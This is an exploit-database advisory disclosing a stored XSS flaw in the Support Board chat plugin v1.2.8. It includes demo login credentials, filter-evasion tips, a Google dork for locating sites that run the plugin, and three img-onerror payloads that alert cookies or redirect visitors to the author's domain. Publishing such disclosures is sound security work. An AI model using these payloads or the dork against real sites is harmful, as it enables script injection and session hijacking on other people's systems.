Support Board - Chat And Help Desk | Support & Chat v1.2.8 Stored XSS Injection

2019.06.13
ru m0ze (RU) ru
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

/*! * ::- Title: Support Board - Chat And Help Desk | Support & Chat v1.2.8 Stored XSS Injection * ::- Author: m0ze * ::- Date: 2019/06/11 * ::- Software: Support Board - Chat And Help Desk | Support & Chat v1.2.8 */ ::- Details & Description -:: ~ Weak security measures like bad textarea data filtering has been discovered in the Ā«Support Board - Chat And Help Desk | Support & ChatĀ». Current version of this web-application is 1.2.8. ::- Demo Website -:: ~ https://codecanyon.net/item/support-board-chat-and-help-desk/20752085 ~ https://codecanyon.net/item/support-board-help-desk-and-chat/20359943 ~ Backend: https://board.support/desk-demo/?login=true ~ Login / Password: demo@board.support / demo ::- Special Note -:: ~ Don't use double quotes inside your payload - they'll be filtered. Avoid to use specific protocol type like http: or https: - your payload will be broken. ::- Google Dork -:: ~ inurl:"/wp-content/plugins/supportboard" ::- PoC Link -:: ~ https://board.support/desk-demo/?login=true ::- PoC [Stored XSS Injection] -:: ~ Go to the demo website https://board.support/desk-demo/?login=true and log in with provided credentials (actually, auth process is not necessary and u can inject your payload as a guest on any website with this plugin up and runnung). Most stable and usefull attack vector is to use the <img> tag with your payload inside, check the provided examples below. ~ Example #1: <img src=x onerror=alert(document.cookie)> ~ Example #2: <img src=x onerror=alert('m0ze');window.open('//m0ze.ru/')> ~ Example #3: <img src=x onerror=alert('m0ze');window.location='//m0ze.ru/'>

References:

https://codecanyon.net/item/support-board-chat-and-help-desk/20752085
https://codecanyon.net/item/support-board-help-desk-and-chat/20359943


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top